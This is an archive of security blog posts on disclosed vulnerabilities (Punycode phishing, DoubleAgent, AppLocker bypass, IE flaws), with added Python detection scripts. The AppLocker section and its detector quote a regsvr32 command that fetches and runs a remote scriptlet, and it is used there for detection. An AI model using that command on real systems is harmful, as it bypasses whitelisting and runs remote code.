Tag Archives: Public Disclosure

Punycode makes phishing harder to detect

In mid-April, security researcher Xudong Zheng publicly disclosed (defined) and provided a demonstration of a security vulnerability within popular web browsers (e.g. Google Chrome, Mozilla Firefox and Opera) which may be used in phishing (defined) attacks.

Why should this vulnerability be considered important?
This vulnerability is not the first of its kind; for example, a similar vulnerability exists in how the DNS protocol resolves device hostnames (defined) (which, when combined with Service Discovery (SD), provides the capability of network resource distribution beyond the reach of multicast, normally limited by the MAC bridge).
However, this vulnerability has the potential to allow an attacker to lead you into clicking a legitimate-looking link which leads to an unexpected website (which the attacker can populate with content of their choice). This can happen because an attacker can send you a highly targeted email (i.e. spear phishing) which you may be expecting, so that you inadvertently click an undesired link or enter login details into a legitimate-looking website (following a link from such an email).

Mr. Zheng demonstrates how this vulnerability exploits the way web browsers translate letters from non-Latin alphabets into Latin-looking letters. For example, he registered the website xn--80ak6aa92e.com, which your web browser displays as apple.com: the site you actually visit is xn--80ak6aa92e.com, but the address bar still shows apple.com. This occurs due to the translation of non-Latin letters into Latin characters making use of Punycode (a recognised standard of the Internet Engineering Task Force).
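The following Python script is an added example (not code from the original post or from Mr. Zheng) showing what is happening underneath the address bar: it decodes the Punycode label the page mentions back into the Unicode a browser would display, works out which Latin name a user would perceive, and applies the kind of display policy browsers adopted in response, showing the raw xn-- form whenever a label is made only of lookalike letters or mixes scripts. The LOOKALIKES table is a small constructed subset of Unicode's confusables data, and the function names are my own; the only value taken from the page is xn--80ak6aa92e.com.

```python
import unicodedata

# Constructed, partial table of Cyrillic and Greek letters that render like
# Latin letters in common fonts. It is an assumption for this example, not a
# complete confusables list (Unicode publishes a full one, confusables.txt).
LOOKALIKES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u0455": "s", "\u0456": "i", "\u0458": "j",
    "\u04bb": "h", "\u04cf": "l", "\u0501": "d", "\u051b": "q", "\u051d": "w",
    "\u03bf": "o",
}


def decode_hostname(host: str) -> str:
    """Turn each xn-- (Punycode) label into the Unicode text a browser would display."""
    labels = []
    for label in host.lower().split("."):
        if label.startswith("xn--"):
            labels.append(label[4:].encode("ascii").decode("punycode"))
        else:
            labels.append(label)
    return ".".join(labels)


def to_punycode(host: str) -> str:
    """Inverse of decode_hostname: ASCII labels stay as they are, others get xn--."""
    labels = []
    for label in host.lower().split("."):
        if label.isascii():
            labels.append(label)
        else:
            labels.append("xn--" + label.encode("punycode").decode("ascii"))
    return ".".join(labels)


def scripts_in(label: str) -> set:
    """Writing systems used by a label, taken from the first word of each
    character's Unicode name (LATIN, CYRILLIC, GREEK, ...). ASCII digits and
    hyphens are script-neutral and reported as COMMON."""
    found = set()
    for ch in label:
        if ch.isascii():
            found.add("LATIN" if ch.isalpha() else "COMMON")
        else:
            found.add(unicodedata.name(ch, "UNKNOWN").split(" ")[0])
    return found


def latin_lookalike(label: str):
    """The Latin string a user would perceive, if every non-ASCII character in
    the label has an entry in LOOKALIKES; otherwise None."""
    perceived = []
    for ch in label:
        if ch.isascii():
            perceived.append(ch)
        elif ch in LOOKALIKES:
            perceived.append(LOOKALIKES[ch])
        else:
            return None
    return "".join(perceived)


def homograph_risk(host: str) -> dict:
    """Flag labels that mix scripts or consist entirely of Latin lookalikes, and
    report the hostname the user would perceive."""
    decoded = decode_hostname(host)
    risky, perceived = [], []
    for label in decoded.split("."):
        if label.isascii():
            perceived.append(label)
            continue
        mixed = len(scripts_in(label) - {"COMMON"}) > 1
        look = latin_lookalike(label)
        if mixed or look is not None:
            risky.append(label)
        perceived.append(look if look is not None else label)
    return {"decoded": decoded, "risky_labels": risky, "perceived": ".".join(perceived)}


def safe_display(host: str) -> str:
    """Address-bar policy: show the Unicode form only when no label is risky;
    otherwise show the raw Punycode so the deception is visible."""
    risk = homograph_risk(host)
    return to_punycode(host) if risk["risky_labels"] else risk["decoded"]


if __name__ == "__main__":
    for h in ("xn--80ak6aa92e.com", "apple.com"):
        r = homograph_risk(h)
        print(f"{h}: decoded={r['decoded']!r} perceived={r['perceived']} show as {safe_display(h)}")
```

Running it shows that xn--80ak6aa92e.com decodes to five Cyrillic letters that are perceived as "apple.com", so the policy keeps the xn-- form; a genuine single-script name such as a Cyrillic word with letters that have no Latin twin is still shown in Unicode, which is the balance a browser has to strike between usability for non-Latin users and homograph detection.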

How can I protect myself from this vulnerability?
While the conventional advice of hovering over a link before clicking to view its actual destination is not redundant, it is now significantly less useful.

If you use a password manager which integrates with your web browser, it will not enter your username/password into a website whose real (Punycode) address differs from the one it has saved, regardless of what the address bar displays. For example, your Apple credentials would not be entered into xn--80ak6aa92e.com.

Google has addressed this vulnerability with the release of Chrome version 58. Opera has also resolved this issue. Mozilla is currently considering the best means to resolve this vulnerability (Firefox 53 mistakenly shows apple.com). In the meantime, Mozilla Firefox users can use the steps mentioned at the end of this news article to mitigate this issue.

For any website important to you, please manually type its address into your web browser's address bar to visit the legitimate website. Using encrypted connections where possible is encouraged, e.g. https://twitter.com or https://mail.google.com.

Thank you.

“DoubleAgent” Vulnerability Disclosure: What you need to know

In late March a security vulnerability was disclosed by the Israeli security firm Cybellum. However, this was no ordinary public disclosure, as I will explain below. Apologies for the untimely nature of this blog post, due to other commitments:

What made this disclosure different?
At first glance this disclosure appeared very serious. It discussed the use of the Microsoft Application Verifier present within Windows XP up to and including Windows 10. They detail leveraging this tool to add a customised verifier DLL (defined) in order to hijack any legitimate process (defined) within Windows.

They demonstrated this attack against anti-malware software, specifically Norton Security (by Symantec), resulting in a rogue DLL being injected (defined here and here) into the Norton process (ns.exe, as demonstrated within their YouTube video). Despite the claims by Cybellum, security firms such as Avira and Comodo have reported that this attack cannot bypass the self-protection features within their products. The full list of capabilities this attack provides is within this news article.

Windows Internals expert Alex Ionescu later revealed that the researchers from Cybellum used his work concerning protected processes to create this exploit and that this was already a known issue. As was pointed out in the Twitter timelines linked to below, once an attacker has administrative control over your system they could simply uninstall your security software rather than trying to bypass it, rendering the threat of this exploit far less important/relevant.

Twitter Timeline 1
Twitter Timeline 2
Twitter Timeline 3
Twitter Timeline 4
Twitter Timeline 5

Does this disclosure only affect security software?
It’s important to note that this attack potentially affects all software on Windows rather than just security software. In addition, the proof of concept (PoC) exploit requires no changes for whichever application is chosen as the target. Security software was chosen since almost all systems have anti-malware software installed and their process names are trusted (and allowed within application-whitelisted (defined) environments).

How can I protect myself from this exploit?
Since this attack requires administrative privileges (defined) on Windows to have its intended effect, using a standard user account for everyday use will mitigate this attack.

From the various statements issued by the affected anti-malware vendors (listed below) please ensure your anti-malware software is the latest version available to ensure this attack is ineffective.

Traditional defences such as patching your operating system and your web browser, and being cautious about the attachments you open, will also reduce the risk posed by this attack.
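Because the attack works by registering a verifier DLL against a process image, a defender's follow-up is to audit where such registrations exist. The Python script below is an added example (not from the original post or from Cybellum) that parses a registry export and reports images that have Application Verifier enabled and load a DLL outside an allowlist of known verifier providers. The registry location under Image File Execution Options, the GlobalFlag value 0x100, the provider DLL names in the allowlist and the sample export text are assumptions I make for this example rather than details quoted on the page; ns.exe is the process named above.

```python
import re

# Registry location Application Verifier uses to attach verifier DLLs to a
# process image. Assumption for this example; the page does not quote it.
IFEO_PREFIX = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
               r"\Image File Execution Options")
FLG_APPLICATION_VERIFIER = 0x100  # GlobalFlag bit that turns verification on

# Constructed .reg export (the shape "reg export" produces; backslashes in string
# values are doubled): one ordinary Application Verifier session on notepad.exe,
# one entry on ns.exe pointing at a DLL that is not a verifier provider, and one
# unrelated IFEO entry with no verifier settings at all.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"GlobalFlag"=dword:00000100
"VerifierDlls"="vrfcore.dll vfbasics.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ns.exe]
"GlobalFlag"=dword:00000100
"VerifierDlls"="C:\\Users\\Public\\agent.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe]
"DisableExceptionChainValidation"=dword:00000000
"""

# Provider DLLs that ship with Application Verifier. This allowlist is something
# you maintain for your own estate; the names here are an assumption.
KNOWN_PROVIDERS = {"vrfcore.dll", "vfbasics.dll", "vfcompat.dll", "vfluapriv.dll"}

KEY_LINE = re.compile(r"^\[(.+)\]$")
VALUE_LINE = re.compile(r'^"([^"]+)"=(dword:([0-9a-fA-F]{8})|"(.*)")$')


def parse_ifeo(reg_text: str) -> dict:
    """Map each image name under IFEO to its values (dword values become ints)."""
    entries, current = {}, None
    for raw in reg_text.splitlines():
        line = raw.strip()
        key = KEY_LINE.match(line)
        if key:
            current = None
            if key.group(1).lower().startswith(IFEO_PREFIX.lower() + "\\"):
                current = key.group(1)[len(IFEO_PREFIX) + 1:].lower()
                entries[current] = {}
            continue
        value = VALUE_LINE.match(line)
        if value and current is not None:
            name, dword, text = value.group(1), value.group(3), value.group(4)
            entries[current][name] = int(dword, 16) if dword else text.replace("\\\\", "\\")
    return entries


def suspicious_verifier_entries(reg_text: str, allow=KNOWN_PROVIDERS) -> list:
    """Images with verification switched on that load at least one DLL that is
    not a known provider: the footprint a defender should review."""
    hits = []
    for image, values in parse_ifeo(reg_text).items():
        flags = values.get("GlobalFlag", 0)
        dlls = str(values.get("VerifierDlls", "")).split()
        if not (flags & FLG_APPLICATION_VERIFIER) or not dlls:
            continue
        unknown = [d for d in dlls if d.split("\\")[-1].lower() not in allow]
        if unknown:
            hits.append((image, unknown))
    return hits


if __name__ == "__main__":
    for image, dlls in suspicious_verifier_entries(SAMPLE_REG_EXPORT):
        print(f"review: {image} loads verifier DLL(s) {dlls}")
```

On a live system the export would come from reg export of that key; the value of the check is that a verifier registration on an anti-malware process, a browser or an Office application is rare enough in normal operation that any unknown DLL there deserves a look, and the allowlist keeps legitimate debugging sessions from raising noise.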

NetworkWorld Anti-Malware Vendor Responses

Malwarebytes Anti-malware

Symantec Endpoint Protection

Symantec Endpoint Protection Affected Versions

Thank you.

December 2016 Security Updates Summary

Today Microsoft and Adobe released their scheduled monthly security updates, the final scheduled set from both vendors for 2016.

Microsoft made 12 bulletins available. These updates address 47 vulnerabilities listed within Microsoft’s security bulletin summary (as before, excluding the Adobe bulletin). These are more formally known as CVEs (defined).

As with previous months, fortunately this month (so far) there are no Known Issues detailed within the above-mentioned summary page. Monitoring that page before deploying the updates, as well as the IT Pro Patch Tuesday blog, will keep you well informed and give you the best opportunity to avoid potential issues. If any issues do arise, those pages should be your first places to check for solutions.

Adobe made available 9 security bulletins which included their regular Flash Player update. Depending on which version of Flash Player you have, please review the Adobe security bulletin or Microsoft bulletin as appropriate and apply the recommended updates. Google Chrome users will have the update installed automatically alongside the updated version of Google Chrome, which will most likely be made available by Google either later today or in the next 1 to 2 days.

The Flash Player update addresses 17x priority 1 CVEs. All of Adobe’s priority ratings are explained in the previous link. The other 8 security bulletins can be summarised as follows:

Adobe Animate (APSB16-38): Addresses 1x priority 3 CVE.
Adobe Experience Manager Forms (APSB16-40): Addresses 2x priority 3 CVEs.
Adobe DNG Converter (APSB16-41): Addresses 1x priority 3 CVE.
Adobe Experience Manager (APSB16-42): Fixes 4x priority 2 CVEs.
Adobe InDesign (APSB16-43): Fixes 1x priority 3 CVE.
Adobe ColdFusion Builder (APSB16-44): Fixes 1x priority 2 CVE.
Adobe Digital Editions (APSB16-45): Fixes 2x priority 3 CVEs.
Adobe RoboHelp (APSB16-46): Fixes 1x priority 3 CVE.

If you use Flash or any of the above products, please review the security bulletins linked to above and apply the necessary updates.

You can monitor the availability of security updates for the majority of your software from the following websites (among others) or use Secunia PSI:

US Computer Emergency Readiness Team (CERT) (please see the “Information on Security Updates” heading of the “Protecting Your PC” page):


A further useful source of update related information is the Calendar of Updates.

News/announcements of updates in the categories of General Software, Security Software and Utilities are available on their website. The news/announcements are very timely and (almost always) contain useful direct download links as well as the changes/improvements made by those updates (where possible).

If you like and use it, please also consider supporting that entirely volunteer run website by making a donation.

If you use any of the above software, please install the appropriate updates as soon as possible. Steps for installing updates for Windows are provided on the “Protecting Your PC” page.

As always; to assist with making the best use of your time when deploying these updates, I will prioritise the updates for you below:

This month is a little different than before, since the Microsoft Internet Explorer and Microsoft Edge bulletins, when combined, address 6 vulnerabilities that have already been publicly disclosed (defined). These should be followed by the Adobe Flash update, which addresses a zero day vulnerability (defined). Next up would be Microsoft Office, the Windows Graphics component and the Microsoft Uniscribe update, due to their criticality.

The remaining security updates can be installed when you have the time to do so. Detailed information on the contents of each security bulletin is published each month within ComputerWorld’s Patch Tuesday Debugged column.

Another security precaution that you may wish to take, if you have Microsoft EMET installed (please ensure your version of EMET is the most recent version, 5.5), is to use it to protect you from Adobe Flash being used to exploit vulnerabilities when you open a Microsoft Office document or Adobe PDF file. I provide recommendations on how to do this at the end of the July 2015 Update Summary.

Please note that Microsoft EMET is in the process of being retired with the end of support scheduled for the 31st of July 2018.

As is my standard practice, I would recommend backing up the data on any device for which you are installing updates in order to prevent data loss in the rare event that any update causes unexpected issues.

Thank you.

Disclosed Microsoft Zero Day Under Attack By APT Group

Update: 8th November:
The Microsoft zero day vulnerability discussed in this post has now been patched. Please refer to this post for the appropriate information and download links.

Thank you.

Original Post:
Earlier this week Google publicly disclosed (defined) details of a new zero day (defined) vulnerability affecting supported versions of Windows up to Windows 10. Fortunately, the disclosure only included minimal details.

Why Should These Issues Be Considered Important?
The vulnerability disclosed by Google could result in an attacker being able to elevate their privileges (defined) on an affected system. However, when used in combination with a previously patched Adobe Flash Player vulnerability (see the previous post), this could result in a Windows system under your responsibility or in your ownership having a backdoor (defined) installed.

Some good news is that this new exploit primarily targets organisations that operate in the following sectors (thus all other organisations are at somewhat reduced risk): government, intelligence or military organisations.

The nature of the backdoor is the decision of the attacker but would usually include a means of remaining persistent on the system and allowing the attacker remote access to the infected system. This backdoor can then be used to move data of the attacker’s choice off the affected system. The APT group behind these attacks is known as STRONTIUM by Microsoft (other aliases used in the wider cyber security industry are APT28, Sofacy, Fancy Bear, TsarTeam, Sednit and PawnStorm). STRONTIUM is also known for moving laterally throughout the networks it compromises (where the pass the hash (PtH) (defined) technique is the method of choice).

How Can I Protect Myself From This Issue?
While a patch from Microsoft is in progress (scheduled for release on the 8th of November), follow safe email guidelines, namely don’t click on unexpected/unsolicited links or open potentially dangerous email attachments, to prevent the execution (carrying out) of the exploit’s actions in the first instance.

If you use the Microsoft Edge or Google Chrome web browsers, the exploit for the local elevation of privilege vulnerability will be mitigated. This is due to Chrome’s sandbox (defined) blocking the use of API (defined) calls to the win32k.sys driver (defined), in addition to its existing mitigations when installed on Windows 10, which I previously discussed.

Microsoft Edge on the other hand implements Code Integrity to prevent the next steps of exploitation.

To protect endpoints within your organisation you could consider utilising the logging capabilities of Microsoft EMET and Sysinternals’ Sysmon by processing their logs using a SIEM (defined) and taking action when that SIEM alerts you to suspicious activity. This is especially relevant since this exploit can be triggered from within web browsers, the Java JRE, Microsoft Word and Microsoft PowerPoint (namely when these applications are used to open suspicious/untrusted files).
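As an added example of the kind of rule a SIEM would run over those Sysmon logs (my own code, not from the original post, Microsoft or Sysinternals), the script below takes process-creation records shaped like Sysmon's Event ID 1 fields and raises an alert when one of the applications named above (Word, PowerPoint, Java or a browser) spawns a shell or script host, or launches an executable from a user-writable directory. The four sample events are constructed, and the parent/child lists are a starting point you would tune for your own estate.

```python
from pathlib import PureWindowsPath

# Applications the post names as the usual launch points for this exploit chain.
DOCUMENT_HANDLERS = {"winword.exe", "powerpnt.exe", "java.exe", "javaw.exe",
                     "iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe"}
# Children a document viewer or browser has no ordinary reason to start.
SUSPECT_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                    "regsvr32.exe", "rundll32.exe", "mshta.exe"}
# Path fragments a standard user can write to (assumption for this example).
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")

# Constructed records using the Sysmon Event ID 1 field names (UtcTime, Image,
# ParentImage, CommandLine). Two are benign, two should alert.
SAMPLE_EVENTS = [
    {"UtcTime": "2016-11-01 09:02:11", "Computer": "ws-17",
     "Image": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\...\WINWORD.EXE" /n "C:\Users\alice\Downloads\brief.docx"'},
    {"UtcTime": "2016-11-01 09:02:40", "Computer": "ws-17",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "CommandLine": r"powershell.exe -File C:\Users\alice\AppData\Local\Temp\upd.ps1"},
    {"UtcTime": "2016-11-01 09:05:03", "Computer": "ws-22",
     "Image": r"C:\Users\bob\AppData\Local\Temp\svchost.exe",
     "ParentImage": r"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe",
     "CommandLine": r"C:\Users\bob\AppData\Local\Temp\svchost.exe"},
    {"UtcTime": "2016-11-01 09:06:15", "Computer": "ws-17",
     "Image": r"C:\Windows\splwow64.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},
]


def process_name(path: str) -> str:
    """Lower-case file name of a Windows path; works on any host OS."""
    return PureWindowsPath(path).name.lower()


def classify(event: dict):
    """Return a reason string if the event matches a rule, else None."""
    parent = process_name(event["ParentImage"])
    child = process_name(event["Image"])
    if parent not in DOCUMENT_HANDLERS:
        return None
    if child in SUSPECT_CHILDREN:
        return f"{parent} spawned {child}"
    if any(fragment in event["Image"].lower() for fragment in USER_WRITABLE):
        return f"{parent} launched binary from user-writable path {event['Image']}"
    return None


def triage(events) -> list:
    """Run every record through classify(); keep (time, host, reason) tuples."""
    alerts = []
    for ev in events:
        reason = classify(ev)
        if reason:
            alerts.append((ev["UtcTime"], ev["Computer"], reason))
    return alerts


if __name__ == "__main__":
    for when, host, reason in triage(SAMPLE_EVENTS):
        print(f"{when} {host}: {reason}")
```

The printing helper spawned by Word in the last record is deliberately included to show that a parent/child rule must be paired with an allowlist of expected children, otherwise the SIEM drowns the genuine alert (a document handler starting PowerShell, or a browser executing something it just wrote to a temporary folder) in noise.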

My thanks to a colleague (you know who you are!) for compiling very useful information for this blog post.

Thank you.

Windows AppLocker Bypass Disclosed

Update: 26th April 2016:
After some further research, this bypass can be blocked by denying regsvr32.exe and regsvr64.exe (depending on your system’s architecture) from accessing the internet.

These files are usually present in the following directories (folders):

C:\Windows\System32 (32 bit systems only)
C:\Windows\SysWOW64 (64 bit systems only)

For 64 bit systems you should block any regsvr32.exe or regsvr64.exe that you find in both of the above folders.

You can use your installed firewall to do this, or use the built-in Windows Firewall to create a rule to do this. Example steps to create rules for the Windows Firewall are located here and here. Please refer to the support website of the manufacturer of your firewall or its user guide if you are using a 3rd party firewall.

Alternatively, you can create a YARA rule to detect the presence of the following string within the memory of the conhost.exe process, which is spawned on Windows 7 and later when a script is executed:

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

The part of the string we are interested in detecting would be the text after the /i switch.
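To make that detection concrete, here is an added Python example (my own code, not from the original post or from the researcher) that does two things a YARA rule or a process-creation log rule would do: pull the value after the /i switch out of a regsvr32 command line and decide whether it points at a remote or local scriptlet, and scan a raw memory buffer for the same pattern the way a YARA string match would. The command lines and the buffer are constructed; only the first command line is the string quoted above.

```python
import re
import shlex
from pathlib import PureWindowsPath

# Constructed command lines as they might appear in conhost.exe memory or a
# process-creation log. The first is the string quoted in the post; the
# second and third are ordinary DLL registrations and must not alert.
SAMPLE_COMMAND_LINES = [
    r"regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll",
    r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"',
    r"regsvr32 /u C:\Windows\System32\msxml3.dll",
    r"REGSVR32 /S /I:https://server/x.sct scrobj.dll",
    r"C:\Windows\System32\regsvr32.exe /i:C:\Temp\local.sct scrobj.dll",
]

REMOTE_URL = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


def regsvr32_install_arg(cmdline: str):
    """Value passed to regsvr32's /i (or -i) switch, or None if the command
    is not regsvr32 or carries no /i switch."""
    try:
        tokens = shlex.split(cmdline, posix=False)   # keep Windows backslashes
    except ValueError:
        tokens = cmdline.split()
    if not tokens:
        return None
    program = PureWindowsPath(tokens[0].strip('"')).name.lower()
    if program not in ("regsvr32", "regsvr32.exe"):
        return None
    for token in tokens[1:]:
        if token[:1] in "/-" and token[1:2].lower() == "i" and token[2:3] == ":":
            return token[3:].strip('"')
    return None


def classify_regsvr32(cmdline: str):
    """Reason string for a scriptlet-loading regsvr32 invocation, else None."""
    arg = regsvr32_install_arg(cmdline)
    if arg is None:
        return None
    if REMOTE_URL.match(arg):
        return "remote scriptlet via /i: " + arg
    if arg.lower().endswith(".sct") or "scrobj.dll" in cmdline.lower():
        return "local scriptlet via /i: " + arg
    return None


# What a YARA rule over process memory is matching: regsvr32, then within a
# short distance an /i: switch whose value is a URL. Captures the URL.
MEMORY_PATTERN = re.compile(rb"regsvr32[^\r\n\x00]{0,200}?/i:(https?://[^\s\"'\x00]+)",
                            re.IGNORECASE)

# Constructed slice of process memory: nulls and unrelated text around the string.
SAMPLE_MEMORY = (b"\x00\x00ConsoleWindowClass\x00"
                 b"regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll\x00"
                 b"\x00regsvr32 /s C:\\Windows\\System32\\msxml3.dll\x00")


def scan_buffer(data: bytes) -> list:
    """URLs handed to regsvr32 /i: found anywhere in a memory buffer."""
    return [m.group(1).decode("ascii", "replace") for m in MEMORY_PATTERN.finditer(data)]


if __name__ == "__main__":
    for cmd in SAMPLE_COMMAND_LINES:
        print(f"{classify_regsvr32(cmd) or 'ok':55} <- {cmd}")
    print("memory scan:", scan_buffer(SAMPLE_MEMORY))
```

Matching on the /i value rather than on regsvr32 itself is what keeps the rule usable: as the original post notes, regsvr32 is run legitimately during installs and updates, so the second and third sample lines must stay quiet while anything that hands it a URL or a .sct file is worth an alert.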

More information about the conhost.exe process is available in this article.

This bypass does not make changes to the Windows registry, but .sct files may be found in the Temporary Internet Files folder. Another well-known security researcher, Alex Ionescu, said that Device Guard (of Windows 10), fully enabled with script protection, will block this bypass as well.

Further discussion and advice for this issue are available within this blog post.

I hope that this information is useful. My thanks to a colleague (you know who you are!) for his very useful insights on this topic.

Thank you.

Original Post:
Last week a security researcher made publicly available proof of concept code that has the ability to bypass Windows AppLocker (application whitelisting).

I have written about this issue separately using Yammer but will provide more discussion below:

Why Should This Issue Be Considered Important?
According to this ThreatPost article, the researcher initially responsibly disclosed (defined) this issue to Microsoft. However, it is uncertain whether Microsoft will create a security update or mitigation to address this issue since AppLocker is functioning as designed. In 2011 a bypass of AppLocker was discovered by Didier Stevens, which was later addressed by Microsoft with a hotfix.

With a known bypass of AppLocker now disclosed, the effectiveness of AppLocker has been significantly reduced. I’m hoping that for this new bypass a similar solution can be found. I’m a particular fan of AppLocker since it provides a strong defence against zero-day malware (defined) and ransomware (defined). It is also relatively easy to configure. An introductory post on configuring AppLocker is this Malwarebytes blog post.

Since it runs with kernel level privileges (defined), it isn’t easy for an attacker to shut it down, and it can be configured to block code that is run by an administrator (defined) (unless that code is already whitelisted). The enhancements it received in Windows 10, e.g. blocking a script from being manually entered at the command prompt, are a good example of defence in depth (defined)(PDF) security.

How Can I Protect Myself From This Issue?
As mentioned above, at this time there is no known workaround for this bypass. While blocking Regsvr32.exe using AppLocker may seem like an obvious solution, this is a legitimate application that is often used by Windows, especially during program installation and updates. Denying this application from running would likely lead to unexpected behaviour.

I’ll monitor this issue and post here should further information become available. Thank you.

Unpatched WinRAR SFX Vulnerability Disclosed

Update: 7th October 2015:
Malwarebytes have carried out additional analysis of this issue and have issued updated guidance on how to protect against it.

Please follow their updated advice to keep your computing devices secure. I echo Malwarebytes’ apology with regard to this issue since the guidance posted by them and by me was based on the information available at the time.

Please disregard my original post (which has now been removed).

Thank you.

Security Vulnerabilities Disclosed in Kaspersky and FireEye Products

Over the weekend a security researcher, Tavis Ormandy, discovered a zero day security vulnerability in Kaspersky Anti-Virus 2015 and 2016. The issue was a buffer overflow (defined) and could be exploited remotely by visiting a website of an attacker’s choice or by receiving specifically crafted data packets from an attacker via the internet connection of the device the Kaspersky product is protecting.

Kaspersky quickly responded by updating its products to resolve this issue and mentioned that they wish to add further mitigation strategies to prevent an issue such as this being found in their products in the future. In addition, Kaspersky already uses Data Execution Prevention (DEP) (defined here and here) and Address Space Layout Randomization (ASLR) (defined) in order to complicate the exploitation of such overflow attacks. A copy of the statement released by Kaspersky is available at the end of this blog post.

If you are using any of Kaspersky’s security products to protect your device, please ensure that it is up to date to protect against this vulnerability being exploited. Further information on updating a selection of Kaspersky products is provided below:

Updating Kaspersky Anti-Virus 2016
Updating Kaspersky Internet Security 2016
Updating Kaspersky Total Security 2016

Links to 2015 and previous products are also provided within the above pages.

If you have any questions, you can contact Kaspersky for assistance. Links to their product forums are provided on the right hand side of this page with contact links for their support teams for business and home users located at the end of the same page.


In a separate disclosure, Kristian Erik Hermansen, a security researcher, provided details of 4 vulnerabilities in FireEye’s security appliances. In addition, a further 30 flaws were discovered through his joint work with another researcher, Ron Perris.

An official advisory (PDF) was published by FireEye with regards to the initial 4 vulnerabilities disclosed by Hermansen. This document provides further information as well as how to obtain the appropriate updates and further recommended best practices. If you use any of the affected products, please follow the steps within the advisory to patch these issues as soon as possible.

I will continue to monitor these issues and will update this blog post as more information becomes available.

Update: 15th September 2015: Further vulnerabilities were patched by FireEye in their products, as documented in this advisory. However, no further details concerning the issues previously discussed have been made available. If you use any of FireEye’s NX, EX, CM, AX or FX products, please ensure that they are running the most current release available from FireEye, as mentioned in both FireEye advisories.

Thank you.

Zero Day Initiative (ZDI) Publicly Discloses 4 New Internet Explorer Vulnerabilities

Update: 6th August 2015:
Sorry for not updating this post sooner. According to two separate news articles here and here, only one of these zero day flaws affected the desktop version of IE (installed on workstations, laptops and servers). This flaw, ZDI-15-359, has been previously patched by Microsoft. In addition, the remaining three flaws affect the version of IE bundled with Windows Phones. A smaller number of Windows Phone users are affected than the number of devices that run the desktop version of IE; however, Windows Phone users should monitor for an update to their phone’s software that should resolve these remaining security issues.

In addition, while these issues were publicly disclosed in July, exact details of the issues were not provided in the ZDI advisories linked to above. Public disclosure usually means all details are disclosed, but in this case the right decision not to publish exact details should help reduce the risk to users until these remaining issues are patched.

Thank you.

Original Post:
Between late 2014 and early 2015 HP’s Zero Day Initiative (ZDI) responsibly disclosed (defined) 4 security vulnerabilities within Internet Explorer (IE) to Microsoft. In all 4 of the disclosures, Microsoft investigated and provided information regarding an expected build/version of IE that would resolve these issues, but in all cases no expected date for this updated build was provided. ZDI notified Microsoft of their intention to disclose details of these flaws publicly following the end of a 120 day deadline.

Each of these 4 security vulnerabilities disclosed by ZDI must be exploited by a user visiting a compromised legitimate website (as seen in watering hole attacks) or a website specifically designed to exploit these flaws.

What Can I Do To Defend Myself From These Unpatched Issues?

  1. A suggestion that does not cost any funds and is easy to implement would be to use another web browser until these issues are patched e.g. Mozilla Firefox, Apple Safari, Opera and Google Chrome being the most popular choices.
  2. Use caution when clicking on any links in emails, instant messages or social networking posts when the links were received unexpectedly or the wording of such messages is suspicious. For shortened links, consider using a preview service to check the destination of the full link before visiting it. Links to preview services are available within the “Protecting Your PC” page of this blog.
  3. Install and enable the default settings of Microsoft EMET. On my personal PCs which use Windows 8.1 64 bit and Windows 7 64 bit I have all mitigations for IE 11 64 bit enabled. A list of known EMET application incompatibilities is available here. You can also ask questions within the EMET forum. The following are very useful tutorials on EMET 5 and EMET 4 (still relevant).
  4. When Windows 10 is released next week, consider using Microsoft Edge since it incorporates additional defences against Use-After-Free flaws (3 of these flaws are use-after-free flaws (defined)) and would not be vulnerable to these issues since Edge is based on a separate codebase to IE (Edge is a development fork of IE). For more background information regarding Microsoft Edge, please see a previous blog post of mine.
  5. Each of the ZDI advisories (linked to below) includes disabling Active Scripting within IE as a mitigation. While this is an effective mitigation, it may affect the reliable display of the websites that you visit.

The recommendation of using EMET will not only protect against these unpatched flaws but also make exploitation of known flaws much harder. Alternatives to EMET are Malwarebytes Anti-Exploit (free or paid for versions) and HitmanPro.Alert (paid for product).

I will update this post should more information on mitigations for these issues become available or any further information is shared regarding when these issues may be patched.

Links to the 4 advisories published by ZDI are shown below:

ZDI-15-359: Microsoft Internet Explorer CTableLayout::AddRow Out-Of-Bounds Memory Access Vulnerability

ZDI-15-360: Microsoft Internet Explorer CAttrArray Use-After-Free Remote Code Execution Vulnerability

ZDI-15-361: Microsoft Internet Explorer CCurrentStyle Use-After-Free Remote Code Execution Vulnerability

ZDI-15-362: Microsoft Internet Explorer CTreePos Use-After-Free Remote Code Execution Vulnerability

Thank you.

HP Publicly Discloses Unpatched Use-After-Free Flaws within (32 bit) Internet Explorer

On Friday of last week HP made available full details of research carried out by 3 security researchers who found new methods of bypassing defences added to Internet Explorer (IE). These are the same researchers that I mentioned in an earlier post. While Microsoft used this research to improve the security of Internet Explorer, they only did so for the 64 bit version of Internet Explorer. The 32 bit version remains vulnerable to the techniques outlined in this research.

In a blog post HP provided the reasons why Microsoft would not patch the 32 bit version of Internet Explorer. I have summarized these reasons below:

  • 64 bit versions of IE benefit the most from ASLR

